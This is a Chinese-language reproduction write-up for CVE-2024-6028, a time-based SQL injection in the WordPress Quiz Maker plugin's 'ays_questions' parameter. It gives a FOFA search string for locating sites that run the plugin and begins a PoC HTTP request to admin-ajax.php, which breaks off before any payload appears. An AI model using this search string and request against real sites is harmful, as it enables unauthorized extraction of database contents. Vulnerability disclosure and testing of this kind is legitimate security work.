WordPress Quiz Maker插件 SQL注入漏洞复现(CVE-2024-6028)

0x01 产品简介

WordPress Quiz Maker插件是一款功能强大的测验生成工具，旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型，包括单选框（MCQ）、复选框（MCQ）、下拉列表（MCQ）、文本、短文本、数字、日期等。还支持横幅（HTML）显示信息性消息、填空题以及匹配题，让测验更加多样化和全面，适合各种规模和需求的网站使用。

0x02 漏洞概述

WordPress的Quiz Maker插件在6.5.8.3版本及以下存在基于时间的SQL注入漏洞，漏洞位于“ays_questions”参数上。由于对用户提供的参数缺乏足够的转义处理和对现有SQL查询的充分准备不足，使得未经验证的攻击者能够在已有的查询中附加额外的SQL查询，从而可能从数据库中提取敏感信息。

0x03 影响范围

Quiz Maker <= 6.5.8.3

0x04 复现环境

FOFA："/wp-content/plugins/quiz-maker/"

0x05 漏洞复现

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe